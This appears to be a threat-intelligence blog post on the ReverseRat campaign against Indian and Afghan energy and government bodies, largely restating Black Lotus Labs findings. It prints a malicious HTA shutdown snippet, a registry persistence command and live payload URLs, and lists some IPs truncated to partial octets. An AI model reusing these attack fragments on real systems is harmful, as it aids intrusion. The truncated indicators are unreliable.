# Pakistani threat group targeting India and Asia’s Critical Industrial Sector Now – And what are we doing ? Waiting for hell to break loose !

We suspected Pakistani threat actor that executed a custom-developed framework to compromise multiple targets in South Asia, including a power company in India.

Team of researchers detected a new remote access Trojan they’re calling ReverseRat.

Based on our global telemetry and analysis, identified that the actor is targeting government and energy organizations in the South and Central Asia regions with operational infrastructure hosted in Pakistan. ReverseRat was deployed in parallel with an open-source RAT called AllaKore to infect machines and achieve persistence. Given the critical nature of the sectors the actor is targeting, we advise security practitioners to learn the actor’s current tactics, tools and procedures to better defend their organizations against potential attacks.

There is lot to know about inner workings of how and why this happened..But the question remains what next and why now ?

Based upon MalBeacon telemetry, we assess that threat actor is very likely operating out of Pakistan. We observed a multi-step infection chain that resulted in the victim downloading two agents; one resided in-memory, while the second was side-loaded, granting threat actor persistence on the infected workstations. The technique documented in the image below was active beginning at least in March 2021 and bi-directional communications with the C2 are, in some instances, still ongoing.

In the first phase of the infection depicted in Figure 1, targeted URLs pointing to compromised websites were delivered to the victim. Black Lotus Labs surmised that the threat actor chose to use compromised domains in the same country as the targeted organization to evade detection and blend in with standard web browsing activity on the target network. While we cannot independently confirm how the URLs were delivered to the victims, the actor likely sent targeted emails or messages.

When clicked, these links downloaded a .zip file containing a Microsoft shortcut file (.lnk) and a benign PDF file. If invoked by the user, the shortcut file would display a benign PDF file, as depicted in Figures 2 and 3. The PDF file acted as a decoy to distract the user while the shortcut file also surreptitiously retrieved and executed an HTA file (HTML application) from the same compromised website. In the observed campaigns, the actor-created HTA files were hosted on the same site as the .zip file, but at different URL paths.

The decoy PDF documents associated with this larger cluster of activity referred to organizations and events relevant to India in spring 2021. Some of the decoy documents, or lures, were more generic, making references to obtain COVID-19 vaccines, while others were more targeted toward, for example, the energy sector.

# Affected Scope

INDUSTRIES: Energy, Government

TARGETED COUNTRIES: Afghanistan, India

MALWARE FAMILY: ReverseRat

ATT&CK IDS:

T1055 – Process Injection

T1102 – Web Service

T1113 – Screen Capture

T1127 – Trusted Developer Utilities Proxy Execution

T1547 – Boot or Logon Autostart Execution

T1574 – Hijack Execution Flow,

T1002 – Data Compressed

T1204.002 – Malicious File

T1059 – Command and Scripting Interpreter

T1218.005 – Mshta

T1219 – Remote Access Software

T1059.003 – Windows Command Shell

T1041 – Exfiltration Over C2 Channel

## Phase 2: Activating HTA files: CactusTorch and preBotHta

In the next phase of infection, the first HTA file retrieved contained JavaScript code based on a GitHub project called CactusTorch. This project was designed to inject a 32-bit shellcode into a running process to help launch a .NET program called preBotHta.pdb, which this actor has been using since 2019. There were two notable features for this 2021 variant of the preBotHta file: first, it ran entirely in memory and, second, it contained logic to alter the placement of the ReverseRat if the host machine ran a certain anti-virus product. If the preBotHta file detected a certain AV product, such as Kaspersky, it placed the ReverseRat in the MyMusic path; otherwise, it placed the file in the Startup folder. When ReverseRat was saved to the file system in January 2021, it displayed the name tasksmgr.exe; later in year they renamed it officetool.exe. Both iterations used an internal file description name of Svchostt.exe.

The ReverseRat

The last action that preBotHta took is to start execution of ReverseRat. The agent began by enumerating the infected device and obtaining the following components via Windows Management Instrumentation (WMI):

• Physical memory on the device converted to Mbs

• Max clock speed converted to Ghz

• Data width converted to bits

• Name (e.g. Intel® Core i7-8569U CPU @ 2.80GHz)

• Manufacturer (e.g. GenuineIntel)

It also used the .NET framework to obtain the following:

The agent then RC4-encrypted this data with a key and sent it to the C2 node. When we decompiled the .NET code, we found the agent had prebuilt functions to run any of the following commands based upon receiving the correct parameter.

Based upon other functions, like the one designed to download executables, and other included functions that covert strings to hex, we suspect that there are subsequent modules that could provide added capabilities.

We assess ReverseRat was developed in-house, artifacts in the samples revealed PDB paths that showed the internal name for this project and that a developer for the project used the screenname Zombie. PDB paths often reference the original path for the source code files on the actor machine. This file was likely imported and compiled by other members of the organization, such as the user Neil as indicated in this metadata.

c:\Users\Zombie\Desktop\ReverseRat client\ReverseRat\ReverseRat\obj\Release\svchostt.pdb

c:\Users\Neil\Desktop\inform\c\ReverseRat\ReverseRat\obj\Debug\ReverseRat.pdb

Notably, the CactusTorch HTA file which dropped ReverseRat included a modification to a JavaScript function that shut down the infected machine after up to 7.2 million seconds (2,000 hours). Previous iterations of this script only allowed the computer to sleep for 900,000 seconds (~102 hours). It is unclear what caused the threat actors to change this time setting.

shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(7200000);var exec = shell.Exec(‘cmd.exe /k shutdown /r /t 0’);exec.StdIn.Close();

### Component 3: The AllaKore Component

In the third component, a second HTA file was retrieved from the same compromised domain that hosted the ZIP and the first HTA file. The second HTA file contained an encoded command to modify a registry key, the loader and AllaKore. Once decoded, the HTA file revealed a version of the AllaKore remote agent, potentially to provide an alternative avenue to maintain access to the compromised network. One rather odd trait of the campaign was the parallel deployment of ReverseRat with AllaKore.

The actor maintained persistence on the target machine’s current user account after reboot through modifying the Run registry key to side-load the actor dropped file.

Command modifying the run registry key:REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /V “WinLogs” /t REG_SZ /F /D “C:\ProgramData\WinLogs\credwiz.exe”

The threat actor side-loaded DUser.dll along with the legitimate Windows application credwiz.exe, a file that is traditionally used for backing up and restoring credentials. DUser.dll acted as a loader to spawn the CreateProcess function on its file, winidr.exe [note the typo in the filename], and ran a wait loop until the AllaKore sample was terminated.

Fortunately for defenders, this agent does not appear to come with any encryption, and it can be detected through network-based monitoring. When we ran the sample in a sandbox, we observed some of the strings in HTTP communications such as “MAINSOCKET”.

### Once we identified the infection chain detailed above, we correlated this campaign’s TTPs to a prior campaign from last year called Operation SideCopy. We observed the same infection process — using shortcut files to retrieve a malicious HTA file on a compromised domain and then spawn a .NET agent. In this case we also observed overlapping metadata between the new and old samples. Notably, we even found overlap with TTPs described in a post dating back to 2019 that described a threat actor side-loading an AllaKore agent with credwiz.exe. Because this actor has operated for years tailoring open-source frameworks, we observe nuances in their environments such as the PDB string that linked other customized open-source capabilities including the Bladabindi agent (based on the well-known trojan njRAT). You can see below the similarity in the two extracted PDB paths below. The top line is the ReverseRat agent internally called Svchostt, and the second is the njRAT sample internally called server:

C:\Users\be\AppData\Local\Temporary Projects\svchostt\obj\x86\Release\svchostt.pdb

C:\Users\be\AppData\Local\Temporary Projects\server\obj\x86\Release\server.pdb

While njRAT is a well-known and documented agent, it shows that this threat actor, like many others, may prefer to use publicly available agents over custom builds.

### Black Lotus Labs Telemetry and Analytics

Telemetry – Victim

A small number of entities exhibited bi-directional communications with the identified nodes.

Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan. The potentially compromised victims aligned with the government and power utility verticals. One point we would like to emphasise is that the agents we discovered were designed for Windows-based machines traditionally found on the IT network; thus far we have not been able to associate any malware samples with this activity cluster that were specifically designed to target systems associated with OT systems.

Some of the victims include:

• A foreign government organization

• A power transmission organization

• A power generation and transmission organization

We do not believe that this list entails the totality of their operations, as some potential victims were associated with dynamic IP addresses, making it difficult to correlate those IP addresses to a single organization.

Telemetry – Threat Actor

Both Black Lotus Labs and MalBeacon were able to independently conclude the actor’s C2 operations are based out of Pakistan. MalBeacon identified the actor source IP, 103.255.7[.]33, an IP assigned to Pakistani mobile data operator CMPak Limited.

With thorough deep dive research fro Cyberkalki Security team, we identified that the source is linked with past malicious behaviour and run decentralised C2 network with state-of-the art sophisticated tools and malware injection techniques used are covert.

Separately, based on Black Lotus Labs analytics and global visibility, we determined that the ReverseRat C2 nodes are controlled by at least two Pakistani IPs: 203.175.72[.]105 and 115.186.189[.]6 on port 8088. Notably, 182.188.181[.]224 briefly serves as a backend node for this operation located at 167.86.97[.]221. The host 203.175.72[.]105 & 173.249.40.68 used for scanning targets and DNS is backed by CMPak and DDNSKing Provider.

Backends and source range IPs:

• 175.72[.]105

• 186.189[.]6

• 255.7[.]33

• 188.181[.]224

• 203.175.72.105 ( This is host used to trigger scan )

• 164.68.108.153

• 182.188.181.224

• 207.180.230.63

Analytics

Black Lotus Labs identified the following network indicators from files pertaining to this infection vector:

• 97.142[.]96

• 68.104[.]126

• 86.75[.]119

• 249.40[.]68

• 91.65[.]100

• 68.108[.]22

Based on internal network telemetry analytics, passive DNS records and open-source malware repositories for related samples, Black Lotus Labs discovered IPs and domains we can also associate with moderately high confidence to this actor.

• 207.180.230[.]63

• 164.68.108[.]153

• 167.86.97[.]221

• 173.249.40[.]68

• 164.68.108.22

• 182.188.181.223

• certindia.ignorelist[.]com

• defencecyberorg.myddns[.]me

• certindia.chickenkiller[.]com

• coronavirusupdate.ddnsking[.]com

Hence, in total there are major below IOC for deep analysis

FileHash-MD5: 34 | FileHash-SHA1: 34 | FileHash-SHA256: 38 | IPv4: 16 | URL: 15 | Domain: 4 | Hostname: 6

## Suspicious Files Dropper

• File : EngrCorpsPolicy.zip
=================================
MD5 bbca148bb1f0d911e286acc779eb738b
SHA-1 4a8b60fed40bda174749ed79e6a0af4cda408916
SHA-256 b74e20c912e5c1529ec73bcd89776d4f81e56663edcfaccc82ecac50e34d5284
Vhash e387536079be3670f79e839f8f3c78b0
SSDEEP 24576:aXnTK3x6bLEjQXnBdVjvOSB5aLGXdXKKO9YMrPUOFn/r8ttiRWs2s2CsB:Un5bLEjQXnBXjvOMkLGNXKKOuezFnTSR
File type ZIP
Magic Zip archive data, at least v1.0 to extract
TrID ZIP compressed archive (80%)
TrID PrintFox/Pagefox bitmap (640×800) (20%)
File size 1.21 MB (1265374 bytes)

### Bundled Files

Posting (AllTypes), Promotions, and Other Record Wing Matters.pdf.lnk

Policy Matters Of Corps/Policy Matters Of Corps.pdf

## Interesting Strings

http://purl.org/dc/elements/1.1/

http://www.w3.org/1999/02/22

System32

mshta.exe

C:\Windows\System32\mshta.exe

desktop-g1i8n3f

<mshta.exe

0NDS-potential-candidates-for-internation-courses)..\..\..\..\..\Windows\System32\mshta.exe

S-1-5-21-2201614678-3791617218-3976912000-1001

## EXIF Data

PROPERTY

VALUE

ZIP:ZipBitFlag

0

ZIP:ZipCRC

0x00000000

ZIP:ZipCompressedSize

0

ZIP:ZipCompression

None

ZIP:ZipFileName

Policy Matters Of Corps/

ZIP:ZipModifyDate

2021:05:27 07:35:06

ZIP:ZipRequiredVersion

10

ZIP:ZipUncompressedSize

0

PDF:CreateDate

2021:05:27 06:16:02+00:00

PDF:Creator

Microsoft® Word for Microsoft 365

PDF:Language

en-US

PDF:Linearized

No

PDF:ModifyDate

2021:05:27 06:16:02+00:00

PDF:PDFVersion

1.7

PDF:PageCount

4

PDF:Producer

Microsoft® Word for Microsoft 365

PDF:TaggedPDF

Yes

XMP:CreateDate

2021:05:27 06:16:02+00:00

LNK:AccessDate

2020:03:04 01:48:10+00:00

LNK:CommandLineArguments

LNK:CreateDate

2019:03:19 04:46:01+00:00

LNK:Description

NDS-potential-candidates-for-internation-courses

LNK:DriveType

Fixed Disk

LNK:FileAttributes

Archive

LNK:Flags

IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode

LNK:HotKey

(none)

LNK:IconFileName

%SystemRoot%\System32\SHELL32.dll

LNK:IconIndex

1

Find all 202 hashes for analysis is stored here

## LNK

NAME

VALUE

76

guid

0114020000000000c000000000000046

creation_time

1319744436

accessed_time

1322776009

modified_time

1319744436

file_size

13312

icon_index

1

windowstyle

SW_NORMAL

hotkey

UNSET – UNSET {0x0000}

reserved0

0

## Mutexes

Local\!PrivacIE!SharedMemory!Mutex

Local\WininetConnectionMutex

Local\_!MSFTHISTORY!_

RasPbFile

Local\ZonesLockedCacheCounterMutex

Local\ZoneAttributeCacheCounterMutex

Local\WininetProxyRegistryMutex

IESQMMUTEX_0_208

## File Behavior

C:\Windows\winsxs\FileMaps\_system32_21f9a9c4a2f8b514.cdf-ms

## Sample File behaviour captured

All IOC related to sample files from DLL analysis to registry changes with screenshots stored here

## Key IOC

TYPE

INDICATOR

https://minervacollege.co.in/fonts/plugins/mrt/Image-7563/css2

https://londonkids.in/preschool/video/Emergency_Vaccination/css/

https://ikiranastore.com/images/files/ist/doc/i.php

https://iiieyehealth.com/fonts/times/files/Call-for-Proposal-DGSP-COAS-Chair-Excellance/css/css.hta

http://5-135-125-106.cinfuserver.com/Emergency_Vaccination/css/

http://207.180.230.63/htt_p

http://173.249.40.68/h_tt_p

http://164.68.108.22/h_ttp

http://164.68.108.153/h_ttp

All IOC, hashes and relevant indicators are stored here

===================================================================

e-mail: complaint.ip@zong.com.pk

country: PK

phone: +9251111222111

fax-no: +92518350356

e-mail: amir.jalal@zong.com.pk

===================================================================

Secondary ASN : AS17557

Organization: Pakistan Telecommunication Company Limited

person: Munir Ahmed

phone: +92-51-4865412

e-mail: munir.ahmed@ptcl.net.pk

===================================================================

Hence, Cyberkalki team have identified infrastructure, TTP and network artefacts

to gain deep insights on this threat group and will continue to monitor infrastructure based on traffic patterns.

Threat Assessment

• The ReverseRat infection chain is noteworthy because of the steps it takes to avoid detection and the critical nature of the targeted entities.

• While this threat actor’s targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest.

• Black Lotus Labs assesses that as this actor continues to develop its capabilities and refine its multi-step infection processes, it could pose a real threat to organizations in and beyond these regions.

Black Lotus Labs Response

• To combat this campaign, Black Lotus Labs null-routed the actor’s infrastructure across the Lumen global IP network and notified the affected organizations.

• Black Lotus Labs continues to follow this threat group to detect and disrupt similar compromises, and it encourages other organizations to monitor for and address this and similar campaigns in their environments.

• Black Lotus Labs is committed to tracking adversary groups such as this and documenting their tradecraft to proactively help defenders.

## Conclusion

While this threat actor’s targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest. Despite previously relying upon open source frameworks such as AllaKore, the actor was able to remain effective and expand its capabilities with the development of the Svchost agent and other components of the ReverseRat project.

We assess that as the actor continues to develop these capabilities, utilise compromised domains and refine these multi-step infection processes, it will pose a real threat to organizations in and beyond these regions. While this actor is not as sophisticated as the most-skilled state-sponsored actors, it should be continually monitored. Black Lotus Labs is committed to tracking adversary groups such as this and documenting their trade-craft to proactively help defenders.

In order to combat this particular campaign, Black Lotus Labs null-routed the actor infrastructure across the global IP network and continues to follow this threat group to detect and disrupt similar compromises, and we encourage other organizations to alert on this and similar campaigns in their environments.

Cyberkalki team have successfully analysed Root cause of fixing this risk and request people and officials from Power, energy and other CI team to contact us for specific mitigation strategy and support. We would love to help you guys for FREE as service to beloved nation INDIA . Big thanks to @OTX team & Black lotus Labs for intel sharing & analysis with deep inspection.